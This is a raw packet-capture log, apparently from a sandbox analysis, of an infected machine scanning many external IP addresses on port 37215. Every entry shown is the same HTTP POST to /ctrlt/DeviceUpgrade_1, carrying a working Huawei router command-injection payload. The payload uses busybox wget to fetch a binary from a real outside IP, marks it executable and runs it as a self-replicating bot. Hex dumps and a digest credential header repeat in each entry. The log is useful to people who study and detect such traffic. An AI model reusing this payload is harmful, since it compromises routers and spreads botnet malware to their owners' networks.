3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1371192.168.2.133878441.123.97.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481126070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1372192.168.2.1338262157.1.149.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481137991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1373192.168.2.1352130148.76.108.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481184959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1374192.168.2.1350290157.196.54.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481205940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1375192.168.2.1352062157.140.237.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481317043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1376192.168.2.135529050.159.186.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481319904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1377192.168.2.1355526157.108.209.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481375933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1378192.168.2.1356566197.69.68.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481388092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1379192.168.2.1339776157.189.249.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481391907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1380192.168.2.1348170197.106.7.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481401920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1381192.168.2.1338090157.222.14.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.481412888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
